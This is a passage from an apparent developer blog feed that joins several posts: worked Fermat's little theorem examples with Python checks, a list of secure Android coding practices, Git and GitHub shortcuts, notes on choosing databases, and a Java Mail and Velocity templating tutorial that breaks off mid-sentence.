<li><span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span></li>
<li><span class="math inline"><em>a</em><sup>(<em>p</em>−1)<em>k</em></sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span> and
k is a natural number.</li>
</ol>
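<p>These statements can be checked quickly with Python’s built-in
three-argument <code>pow</code>, which performs modular exponentiation.
The prime 31 and the exponent multiplier <code>k = 7</code> are arbitrary
choices for this sketch.</p>

```python
p = 31  # any prime works here

# a^p ≡ a (mod p) for every integer a.
first_form = all(pow(a, p, p) == a % p for a in range(0, 3 * p))

# a^(p-1) ≡ 1 (mod p) whenever a is not a multiple of p.
second_form = all(pow(a, p - 1, p) == 1 for a in range(1, p))

# a^((p-1)k) ≡ 1 (mod p) for a natural number k.
k = 7
third_form = all(pow(a, (p - 1) * k, p) == 1 for a in range(1, p))

print(first_form, second_form, third_form)
```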
<h4 id="test-for-primality">Test for primality</h4>
<p>r is a prime number iff <span class="math inline"><em>a</em><sup>(<em>r</em>−1)</sup> ≡ 1 (mod <em>r</em>)</span>
for all <span class="math inline">1 ≤ <em>a</em> ≤ <em>r</em> − 1</span></p>
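<p>A direct, deliberately naive sketch of this test checks every base
from 1 to r − 1. The function name <code>is_prime_fermat</code> is an
assumption for this example, and checking all bases is far slower than
practical primality tests; it is only meant to mirror the statement
above.</p>

```python
def is_prime_fermat(r):
    """True iff a^(r-1) ≡ 1 (mod r) for every base a in 1..r-1."""
    if r < 2:
        return False
    return all(pow(a, r - 1, r) == 1 for a in range(1, r))


primes_below_30 = [r for r in range(2, 30) if is_prime_fermat(r)]
print(primes_below_30)

# 561 = 3 * 11 * 17 passes the test for every base coprime to it,
# but fails for bases that share a factor with it, such as 3.
print(is_prime_fermat(561))
```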
<h4 id="question-what-is-222006-pmod-3">Question: What is <span class="math inline">2<sup>2<sup>2006</sup></sup> (mod 3)</span></h4>
<p>From Fermat’s little theorem we know that <span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span></p>
<blockquote>
<p>The trick here is to make the power same as <span class="math inline">(<em>p</em>−1)</span></p>
</blockquote>
<p>So we can formulate that,</p>
<p><span class="math inline">2<sup>(3−1)</sup> ≡ 1 (mod 3)</span> which
becomes <span class="math inline">2<sup>2</sup> ≡ 1 (mod 3)</span></p>
<p>which means</p>
<p><span class="math inline">2<sup>(2<sup>2006</sup>)</sup> ≡ 1 (mod 3)</span>
i.e., <span class="math inline">(2<sup>2</sup>)<sup>2<sup>2005</sup></sup> ≡ 1<sup>(2<sup>2005</sup>)</sup> (mod 3)</span></p>
<p>So, the solution is <span class="math inline">2<sup>2<sup>2006</sup></sup> (mod 3) ≡ 1 (mod 3)</span></p>
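<p>The result can be confirmed with Python’s built-in modular
exponentiation, which handles the 2006-bit exponent without computing
the full power. The variable names are only for illustration.</p>

```python
exponent = 2 ** 2006

# Direct modular exponentiation of 2^(2^2006) mod 3.
result = pow(2, exponent, 3)

# Same answer by reducing the exponent modulo p - 1 = 2 first.
reduced = pow(2, exponent % 2, 3)

print(result, reduced)
```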
<h4 id="question-is-the-difference-between-530000-and-6123456-divisible-by-31">Question:
Is the difference between <span class="math inline">5<sup>30000</sup></span> and <span class="math inline">6<sup>123456</sup></span> divisible by 31</h4>
<p>From Fermat’s little theorem we know that <span class="math inline"><em>a</em><sup>(<em>p</em>−1)<em>k</em></sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span> and
k is a natural number.</p>
<blockquote>
<p>The trick here is to make the power same as <span class="math inline">(<em>p</em>−1)</span></p>
</blockquote>
<p>We know that <span class="math inline">5<sup>30000</sup> = 5<sup>(31−1) × 1000</sup> = (5<sup>30</sup>)<sup>1000</sup></span></p>
<p>Rewriting the modular equation similar to Fermat’s little theorem
<span class="math inline">(5<sup>30</sup>)<sup>1000</sup> ≡ 1 (mod 31)</span></p>
<p>For the second part, dividing 123456 by 30 gives a remainder of 6 and a
quotient of 4115. So the second part of the equation can be rewritten as,
<span class="math inline">6<sup>123456</sup> = (6<sup>6</sup>)(6<sup>30</sup>)<sup>4115</sup></span></p>
<p>Using Fermat’s little theorem <span class="math inline">(6<sup>30</sup>)<sup>4115</sup> ≡ 1 (mod 31)</span></p>
<p>That leaves, <span class="math inline">(6<sup>6</sup>) (mod 31)</span> to be computed.</p>
<p>Breaking this further,</p>
<p><span class="math inline">6<sup>6</sup> ≡ (6<sup>2</sup>)(6<sup>2</sup>)(6<sup>2</sup>) (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ (5)(5)(5) (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ 125 (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ 1 (mod 31)</span></p>
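<p>The reduction steps above can be verified numerically; this is just a
check of the arithmetic, with variable names chosen for illustration.</p>

```python
p = 31

# 5^30000 = (5^30)^1000, so it reduces to 1 modulo 31.
first = pow(5, 30000, p)

# 123456 = 30 * 4115 + 6, so only 6^6 needs to be computed.
quotient, remainder = divmod(123456, p - 1)
second = pow(6, 123456, p)
second_reduced = pow(6, remainder, p)

difference = (first - second) % p
print(first, quotient, remainder, second, difference)
```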
<p>So the difference between <span class="math inline">5<sup>30000</sup></span> and <span class="math inline">6<sup>123456</sup></span> being divisible by 31 is
simply written as, <span class="math inline">1 (mod 31) − 1 (mod 31) = 0 (mod 31)</span> which
implies that it is indeed divisible by 31.</p>Steps for secure Android Application development2015-03-22T00:00:00-07:002015-03-22T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2015-03-22:/posts/steps-for-secure-android-application-development.htmlIn a recent working session, some of the best practices for secure Android application development were discussed. The following were some of the important aspects of the discussion. Other than the usual standards of securing the APK and securing the server-side components, some of the development and secure coding practices are listed in this post.<p>In a recent working session, some of the best practices for secure
Android application development were discussed. The following were some
of the important aspects of the discussion. Other than the usual
standards of securing the APK and securing the server-side components,
some of the development and secure coding practices are listed in this
post. It’s the responsibility of every Android app developer to keep
themselves apprised of new threats using the OWASP Mobile Top 10 Risks.</p>
<h3 id="data-classification-and-handling-standards">Data classification
and Handling Standards</h3>
<ol type="1">
<li>All persisted data should be encrypted - SQLite DB, files, data
providers, etc.</li>
<li>Don’t transmit sensitive data to unapproved 3rd party.</li>
<li>Don’t put sensitive data into Intents</li>
</ol>
<h3 id="mobile-privacy">Mobile privacy</h3>
<ol type="1">
<li>Respect user’s privacy by collecting minimum amount of data</li>
<li>GPS & location data - fine grain vs. coarse grain GPS data</li>
<li>Contact Info</li>
<li>Microphone and Camera use</li>
<li>Tracking and Analytics IDs</li>
</ol>
<h3 id="attack-surface-analysis">Attack Surface Analysis</h3>
<ol type="1">
<li>Third party code automatically inherits app permissions. Treat new
versions of library as a new version of your app.</li>
<li>Use Google Alerts for any security disclosures regarding the 3rd
party library.</li>
</ol>
<h3 id="securing-logs">Securing logs</h3>
<ol type="1">
<li>Do not enable crash logs by default. Get user consent before
logging.</li>
<li>Do not store crash logs for too long</li>
<li>Do not send plain-text logs over HTTP</li>
<li>Mask sensitive user information in the logs - starbucks usecase</li>
<li>Minimize the number of permissions - don’t ask for what you don’t
need (e.g. incoming SMS messages)</li>
</ol>
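<p>Masking can be sketched independently of the platform. The snippet
below is a language-neutral illustration written in Python rather than
Android code; the regular expressions and the <code>mask</code> helper
are simplified assumptions and would need tightening for real log
data.</p>

```python
import re

# Simplified patterns for illustration only.
EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
CARD = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")


def mask(line):
    """Replace e-mail addresses and card-like numbers before logging."""
    line = EMAIL.sub("[email]", line)
    # Keep only the last four digits of anything that looks like a card number.
    return CARD.sub(lambda m: "*" * 12 + re.sub(r"\D", "", m.group())[-4:], line)


masked = mask("user=jane@example.com card=4111 1111 1111 1111")
print(masked)
```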
<h3 id="securing-intents">Securing Intents</h3>
<ol type="1">
<li>Use PendingIntents as delayed callbacks to private Broadcast
receivers</li>
<li>Use Explicit intents as much as possible</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a>context<span class="op">.</span><span class="fu">sendBroadcast</span><span class="op">(</span>intent<span class="op">,</span><span class="st">"custom-permission"</span><span class="op">);</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a>context<span class="op">.</span><span class="fu">startActivity</span><span class="op">(</span>intent<span class="op">);</span></span></code></pre></div>
<h3 id="permissions-and-intents">Permissions and Intents</h3>
<ol type="1">
<li>Use custom permission for 3rd party or other apps to subscribe for
notifications</li>
<li>For sensitive activities, set FLAG_SECURE constant flag in
WindowManager.LayoutParams</li>
<li>Perform intent data validation</li>
<li>For private activities, use explicit intent</li>
<li>Separate services in AndroidManifest with explicit and separate
permissions</li>
<li>Use explicit intent to call Service</li>
<li>Use <code>checkCallingPermission()</code> to verify if permission is
available to the caller</li>
</ol>
<h3 id="data-security">Data Security</h3>
<ol type="1">
<li>Use record level delegation feature to share a specific record or
file without sharing the entire database to provide minimum access.</li>
<li>Never trust the parameters passed to content providers. Sanitize for
injection attacks.</li>
<li>Securing ContentProviders. Always set <code>exported=false</code> in
your <strong>AndroidManifest.xml</strong></li>
<li>Specify explicit permissions for reading and writing.</li>
<li>Set the <code>grantUriPermissions</code> attribute to true to
grant permission to a certain portion of the data for a certain amount
of time.</li>
</ol>
<h3 id="webview-security">WebView Security</h3>
<ol type="1">
<li>Disable JS and Plugin support if not needed</li>
<li>No local file access</li>
<li>Do not load 3rd party hosts unless validated</li>
<li>Do not follow redirect requests in the server response unless
validated</li>
<li>If possible, use only https</li>
<li>Disable form auto-fill feature by using
<code>WebView.WebSettings.setSaveFormData()</code> as false</li>
<li>Reject unexpected content - only allow HTML for main page (reject
PDFs etc.,)</li>
<li>Secure Page Rendering in WebView - shouldOverrideUrlLoading</li>
<li>Access Modifiers should not be trusted for sensitivity.</li>
<li>Clear the cache after a WebView displays a sensitive page.</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="co">// Inside a WebViewClient subclass: clear the cache once the page has loaded</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a><span class="kw">public</span> <span class="dt">void</span> <span class="fu">onPageFinished</span><span class="op">(</span>WebView view<span class="op">,</span> <span class="bu">String</span> url<span class="op">){</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> view<span class="op">.</span><span class="fu">clearCache</span><span class="op">(</span><span class="kw">true</span><span class="op">);</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<ol start="11" type="1">
<li>Ensure that UI redressing (a.k.a. tapjacking) protection is set up
to prevent clickjacking. Use
<code>setFilterTouchesWhenObscured(true)</code> or the
<code>android:filterTouchesWhenObscured</code> attribute on the
view.</li>
</ol>
<h3 id="development-practices">Development practices</h3>
<ol type="1">
<li>Keep sensitive data such as encryption keys, authn/authz tokens and
passwords in RAM no longer than required.</li>
<li>Variables should be nullified after use</li>
<li>Use byte[] and char[] rather than Strings for sensitive data, since
arrays can be overwritten after use.</li>
</ol>
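<p>The idea behind preferring mutable arrays over immutable strings can
be sketched in a language-neutral way. The Python snippet below is an
illustration only, not Android code: a <code>bytearray</code> stands in
for byte[], and the <code>wipe</code> helper and the sample secret are
assumptions. A real runtime may still hold other copies of the data.</p>

```python
def wipe(buffer):
    """Overwrite a mutable buffer in place so the secret does not linger."""
    for i in range(len(buffer)):
        buffer[i] = 0


# A mutable buffer can be zeroed; an immutable string cannot.
secret = bytearray(b"s3cr3t-token")
try:
    token_length = len(secret)  # stand-in for the real use of the secret
finally:
    wipe(secret)

print(secret)
```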
<h3 id="internal-storage">Internal Storage</h3>
<ol type="1">
<li>Accessible only to your app</li>
<li>clean the cache using deleteFile()</li>
</ol>
<h3 id="external-storage">External Storage</h3>
<ol type="1">
<li>Globally readable and writable</li>
<li>Can be physically removed</li>
<li>Avoid using this storage for sensitive apps in general. Use
<code>preferInternal</code> to prevent app being installed in external
storage.</li>
<li>Use the Keychain API for system wide credentials</li>
<li>Use the Keystore to store the app’s own credentials</li>
<li><code>file.delete()</code> does not securely delete.</li>
<li>Always delete cache files when user logs out</li>
<li>Do not keep files with any sensitive data any longer than absolutely
needed.</li>
<li>Do not create files with MODE_WORLD_READABLE or writeable</li>
<li>Do not use modes such as 0666, 0777, 0663 with the chmod binary or
syscalls accepting a file mode</li>
<li>Only share info using content providers instead of file system</li>
</ol>
<h3 id="cryptography">Cryptography</h3>
<ol type="1">
<li>Don’t store secret keys in plain text</li>
<li>Never roll your own crypto libraries. Use the approved ones</li>
<li>Never store secrets using String - only char[] and byte[]</li>
<li>Never seed SecureRandom</li>
</ol>
<h3 id="camera-feed">Camera feed</h3>
<ol type="1">
<li>Use the default Camera app/services</li>
<li>Or, create SurfaceView to display a Camera Preview and click button
to convert to Picture</li>
</ol>
<h3 id="url-connections">URL Connections</h3>
<ol type="1">
<li>Use TLS instead of SSLv3.</li>
<li>Use only https</li>
<li>SSLSocket class can be used but with caution. It does not do
hostname verification.</li>
<li>If overriding, check that <code>getDefaultHostnameVerifier()</code> or
<code>HostnameVerifier.verify()</code> returns boolean true.</li>
</ol>Git and Github secrets2014-01-23T00:00:00-08:002014-01-23T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2014-01-23:/posts/git-and-github-secrets.htmlSome git and github usage secrets for quick reference.<p>The Git command line and Github are two of the most used tools for a web
developer. Especially in a team environment, we use these more than a
few times in a day. Recently I came across a screencast held at Aloha
Ruby Conference. Some of the important and amazing shortcuts and useful
tips discussed are summarized below. Rather than using them all, we
should start with a couple of them and practise them, which definitely
improves our tooling and productivity.</p>
<h3 id="github">Github</h3>
<p><strong>Adding .diff or .patch to the URL provides a clearer
textual representation</strong></p>
<div class="sourceCode" id="cb1"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189.diff</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189.patch</span></code></pre></div>
<p><strong>Remove Whitespace differences using</strong>
<code>?w=1</code></p>
<p><strong>Cool octocat images @ octodex.github.com</strong></p>
<p><strong>URL Shortener : git.io</strong> Usage:
<code>gitio <url> <name?</code></p>
<p><strong>Lexer and Highlighting Languages:</strong> <a href="https://github.com/github/linguist" title="Linguist">Linguist</a></p>
<p><strong>Gist as Screenshot sharing and discussion tool</strong>
<code><https://gist.github.com/></code></p>
<p><strong>Git + Hub super commands</strong> Hub is a command line tool
that wraps git in order to extend it with extra features and commands
that make working with GitHub easier. <a href="https://github.com/defunkt/hub" title="hub repo">hub repo</a></p>
<p><strong>Key Shortcuts</strong> Press in repo page <code>t</code> -
for File Finder <code>w</code> - branch selector <code>s</code> - quick
search</p>
<p><strong>@mention</strong> - adds the person to the conversation.
<strong>@Organization/Team</strong> - adds the
organization/team to the conversation</p>
<p><code>#<number></code> - <strong>autolinks to issue
number</strong> Example: using a commit message such as “closes
<code>#1291</code>” autolinks to the issue</p>
<p><strong>Adding</strong> <code>?author=sengopal</code> <strong>or
email address to</strong> <code>github.com/repo/commits/master</code>
<strong>gives the list of commits by that author.</strong></p>
<p>Example:
https://github.com/sengopal/immuno/commits/master?author=sengopal</p>
<p><strong>Pulls needn’t be from a fork, but can be done from branches
as well</strong></p>
<p><strong>Github supports emojis, which are listed at</strong> <a href="http://emoji-cheat-sheet.com" title="Emoji-cheat-sheet">Emoji-cheat-sheet</a></p>
<h3 id="git-line-quirks">Git line quirks</h3>
<ol type="1">
<li><p><code>git branch --merged</code></p></li>
<li><p><code>git branch --no-merged</code></p></li>
<li><p><code>git branch --contains <sha></code> - which branch has
this SHA</p></li>
<li><p><code>git checkout <branch_name> -- <path to file></code>
- checkout that file from that branch into your current branch</p></li>
<li><p><code>git log branchA ^branchB</code> - commits in A not in
B</p></li>
<li><p><code>git fsck --lost-found</code></p></li>
<li><p><code>git diff HEAD^ --stat</code></p></li>
<li><p><code>git blame -w</code> - ignores whitespace-only changes when
assigning blame</p></li>
<li><p><code>git blame -M</code> - shows the original commit and not the
commit that moved the lines</p></li>
<li><p><code>git blame -C</code> - same as -M, but also looks at other
files changed in the same commit <em>-CC, -CCC are the other variations
available</em></p></li>
<li><p><code>git status -sb</code></p></li>
<li><p><code>git diff HEAD^ --word-diff</code></p></li>
<li><p><code>git config --global help.autocorrect 1</code></p></li>
<li><p><code>git config --global rerere.enabled 1</code> - long running
branches, remembers merge conflicts</p></li>
<li><p><code>git config --global color.ui 1</code></p></li>
<li><p><code>git-amend</code> - alias to
<code>git commit --amend -C HEAD</code></p></li>
<li><p><code>git undo</code> - alias to
<code>git reset --soft HEAD^</code> - retains commit as staged</p></li>
<li><p><code>git-count</code> - alias to
<code>git shortlog -sn</code></p></li>
<li><p><code>git add -p</code> - useful for logical commits</p></li>
<li><p><code>git show :/<query></code> - shows the most recent
commit whose message matches the query</p></li>
</ol>
<p><strong>Commit Comparison</strong></p>
<p>Line linking - #L16, #L16-L25</p>
<p><em>Advanced Compare View</em></p>
<p>Range - <code>master@{1.day.ago}...master</code>; bookmark that page
to see what the team has been up to over the last day</p>
<h3 id="key-git-commands-in-order-of-importance">Key Git commands in
order of importance</h3>
<ul>
<li>Clone – Creates a repository from a network or local location</li>
<li>Status – What is staged, and in the working directory</li>
<li>Log – history of commits</li>
<li>Add – stage a file for the next commit</li>
<li>Commit – Record the staged files as a commit</li>
<li>Reset – unstage changes or, with <code>--hard</code>, discard changes in the working directory</li>
<li>Pull – Perform a fetch & merge operation</li>
<li>Push – send your changes to the parent repository</li>
<li>Branch – to create a new branch</li>
<li>Checkout – switch branches or restore one or more files</li>
<li>Clean – removing files that exist only in the working directory</li>
<li>Fetch – Get changes from the parent repository to store within the
current repo</li>
<li>Merge – Combine two or more branches of development into one</li>
</ul>Eight steps in choosing a database2014-01-20T00:00:00-08:002014-01-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2014-01-20:/posts/eight-steps-in-choosing-a-database.htmlThis post chronicles the list of steps that were followed for selecting a database based on its attributes and capabilities<p>We are planning a database architecture rewrite for an existing
service and the needs of the project are:</p>
<ol type="1">
<li>Consistent data with ACID compliance for LIVE data</li>
<li>Async writes and random reads for metadata</li>
<li>Fast and Async writes and very low reads for audit information</li>
</ol>
<p>Usually, experts suggest a multi-database solution, or polyglot
persistence approach, instead of a traditional monolithic RDBMS
solution.</p>
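<p>As a rough illustration of the polyglot idea, the sketch below routes each kind of data from the requirements list to a category of store. The names <code>DataKind</code>, <code>StoreType</code> and <code>storeFor</code> are hypothetical and exist only for this example; the mapping is an assumption about how such routing might look, not a description of the final architecture.</p>

```java
import java.util.EnumMap;
import java.util.Map;

public class PolyglotRouting {
    /** The three kinds of data named in the requirements list. */
    enum DataKind { LIVE, METADATA, AUDIT }

    /** Hypothetical store categories, not specific products. */
    enum StoreType { ACID_RELATIONAL, WRITE_OPTIMIZED }

    private static final Map<DataKind, StoreType> ROUTES = new EnumMap<>(DataKind.class);
    static {
        // Live data needs ACID guarantees; metadata and audit data favor fast async writes.
        ROUTES.put(DataKind.LIVE, StoreType.ACID_RELATIONAL);
        ROUTES.put(DataKind.METADATA, StoreType.WRITE_OPTIMIZED);
        ROUTES.put(DataKind.AUDIT, StoreType.WRITE_OPTIMIZED);
    }

    /** Returns the store category assumed for the given kind of data. */
    static StoreType storeFor(DataKind kind) {
        return ROUTES.get(kind);
    }

    public static void main(String[] args) {
        for (DataKind kind : DataKind.values()) {
            System.out.println(kind + " -> " + storeFor(kind));
        }
    }
}
```

<p>Keeping the routing in one place means the application code asks for a store by the kind of data it handles rather than by database product.</p>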
<h3 id="disadvantages-of-rdbms">Disadvantages of RDBMS</h3>
<p>Scaling a traditional RDBMS is difficult. Partitioning
schemes, multi-master configurations, and redundancy systems offered by
Oracle, SQL Server, and DB2 are expensive and problematic, and they
often fail to meet the needs of high-scale applications. An RDBMS is
also a poor fit for short-lived data and for data with widely varying
lifetimes.</p>
<h2 id="available-databases">Available Databases</h2>
<p>Some of the database types available as per this <a href="https://dzone.com/articles/review-persistence-strategies">Dzone
article</a> are:</p>
<h3 id="key-value-stores">Key-Value stores</h3>
<p>The most commonly used database solutions are Key-Value stores such
as Aerospike, Redis, and Riak. These are easy to install and to
integrate into an application.</p>
<h3 id="column-family-databases">Column-Family databases</h3>
<p>The other common databases are Cassandra and HBase. HBase runs on top
of Hadoop's HDFS, while Cassandra manages its own storage, and the two
have different write semantics: HBase offers strong write consistency,
whereas Cassandra offers <em>eventual consistency</em>. Cassandra is
also well suited to write-intensive workloads with random reads.</p>
<h3 id="document-databases">Document Databases</h3>
<p>Document databases scale quite well and are great for web-based
operational systems that operate on a single big entity, or systems that
don’t require transactional integrity across entities. MongoDB and
Couchbase are typically the leaders in this sector.</p>
<h3 id="graph-databases">Graph Databases</h3>
<p>Social networks and recommendation systems are classic use cases for
graph databases, but there are a few different types of graph databases.
Some of them are custom made for operational purposes (Neo4j) while
others are aimed more at analytics (Apache Giraph).</p>
<p>Based on the above descriptions and on availability and support
within our organization, the following databases were selected.</p>
<table>
<thead>
<tr class="header">
<th>Database</th>
<th>Storage for</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Oracle</td>
<td>Partition scheme. Store Live data.</td>
</tr>
<tr class="even">
<td>Cassandra</td>
<td>Heavy writes for Async metadata</td>
</tr>
<tr class="odd">
<td>Cassandra</td>
<td>Heavy writes for Audit log</td>
</tr>
</tbody>
</table>Java Mail Made Easy using Velocity Templates2010-10-01T00:00:00-07:002010-10-01T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2010-10-01:/posts/java-mail-made-easy-using-velocity-templates.htmlFor an emailing solution we used velocity templates for simpler generation of Java mail templates and data. This post explains the code and the setup to get this in simple steps.<h3 id="introduction-to-velocity">Introduction to Velocity</h3>
<p>Velocity is an open source templating tool developed by an
international volunteer community and hosted by the Apache Software
Foundation’s Jakarta Project. You can download the freely available
source code at the <a href="http://www.javaworld.com/javaworld/jw-12-2001/jw-1228-velocity.html#resources">Jakarta
Velocity</a> Project Website.</p>
<h3 id="simple-velocity-template-example">Simple Velocity Template
Example</h3>
<p>Any application using Velocity requires two parts. The first is the
template, and the second is the Java code that supplies the data and
renders the template.</p>
<p><strong>Helloworld.vm</strong></p>
<pre><code> Hello $name! Welcome to Velocity!</code></pre>
<p><strong>HelloWorld.java:</strong></p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">io</span><span class="op">.</span><span class="im">StringWriter</span><span class="op">;</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">Template</span><span class="op">;</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">VelocityContext</span><span class="op">;</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">app</span><span class="op">.</span><span class="im">Velocity</span><span class="op">;</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> </span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> HelloWorld<span class="op">{</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> <span class="dt">void</span> <span class="fu">main</span><span class="op">(</span> <span class="bu">String</span><span class="op">[]</span> args <span class="op">)</span> <span class="kw">throws</span> <span class="bu">Exception</span> <span class="op">{</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> <span class="co">/* Get the Template */</span></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a> Template t <span class="op">=</span> Velocity<span class="op">.</span><span class="fu">getTemplate</span><span class="op">(</span><span class="st">"Helloworld.vm"</span> <span class="op">);</span></span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="co">/* create a context and add data */</span></span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a> VelocityContext context <span class="op">=</span> <span class="kw">new</span> <span class="fu">VelocityContext</span><span class="op">();</span></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"name"</span><span class="op">,</span> <span class="st">"World"</span><span class="op">);</span></span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a> <span class="co">/* now render the template into a StringWriter */</span></span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a> <span class="bu">StringWriter</span> writer <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringWriter</span><span class="op">();</span></span>
<span id="cb2-15"><a aria-hidden="true" href="#cb2-15" tabindex="-1"></a> t<span class="op">.</span><span class="fu">merge</span><span class="op">(</span> context<span class="op">,</span> writer <span class="op">);</span></span>
<span id="cb2-16"><a aria-hidden="true" href="#cb2-16" tabindex="-1"></a> <span class="co">/* show the World */</span></span>
<span id="cb2-17"><a aria-hidden="true" href="#cb2-17" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span> writer<span class="op">.</span><span class="fu">toString</span><span class="op">()</span> <span class="op">);</span></span>
<span id="cb2-18"><a aria-hidden="true" href="#cb2-18" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-19"><a aria-hidden="true" href="#cb2-19" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p><strong>Output</strong></p>
<pre><code> Hello World! Welcome to Velocity!</code></pre>
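<p>To make the merge step less of a black box, here is a minimal, dependency-free sketch of what replacing <code>$name</code> with a context value amounts to. It is not how Velocity is implemented, and the class <code>MiniTemplate</code> and its <code>merge</code> method are hypothetical names used only for illustration; it handles plain <code>$identifier</code> references and nothing else.</p>

```java
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class MiniTemplate {
    // Matches simple references such as $name; real Velocity syntax is far richer.
    private static final Pattern REFERENCE =
            Pattern.compile("\\$([A-Za-z_][A-Za-z0-9_]*)");

    /** Replaces each $key in the template with the matching context value. */
    static String merge(String template, Map<String, ?> context) {
        Matcher matcher = REFERENCE.matcher(template);
        StringBuffer out = new StringBuffer();
        while (matcher.find()) {
            Object value = context.get(matcher.group(1));
            // References with no value in the context are left untouched.
            String replacement = (value != null) ? value.toString() : matcher.group();
            matcher.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        matcher.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        Map<String, Object> context = new HashMap<>();
        context.put("name", "World");
        // prints "Hello World! Welcome to Velocity!"
        System.out.println(merge("Hello $name! Welcome to Velocity!", context));
    }
}
```

<p>The real engine adds directives, method calls on beans and template caching on top of this basic substitution, which is why a templating library is preferable to hand-rolled replacement for anything beyond a toy.</p>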
<h3 id="introduction-to-java-mail-api">Introduction to JAVA MAIL
API</h3>
<p>The Java Mail API provides the capability to develop email clients
and mail-enabled Java applications. It supports the creation of
sophisticated user interfaces for mail clients. It includes appropriate
convenience classes, which encapsulate common mail functions and
protocols. It fits with other packages for the Java platform in order to
facilitate its use with other Java APIs. It provides a mail and
messaging framework addition to the Java platform.</p>
<p>Although the Java Mail API contains many more classes than those
discussed here, concentrating on some of the core classes to start with
makes it easy to understand the essence of the API. The following is a
brief description of the core classes:</p>
<h4 id="javax.mail.session">javax.mail.Session</h4>
<p>The javax.mail.Session class is the top-level entry class for the
Java Mail API, and its most commonly used methods provide the ability to
control and load the classes that represent the service provider
implementations (SPI) for various mail protocols (Note: A service
provider is a developer and/or vendor that provides an implementation
for an API; examples of Java Mail API implementations include POP3,
SMTP, and IMAP4 – some are available from Sun, others via third
parties.)</p>
<h4 id="javax.mail.transport">javax.mail.Transport</h4>
<p>The javax.mail.Transport class is another provider-implemented class
and is used for sending a message over a specific protocol.</p>
<h4 id="javax.mail.message">javax.mail.Message</h4>
<p>The javax.mail.Message class is implemented by a provider and models
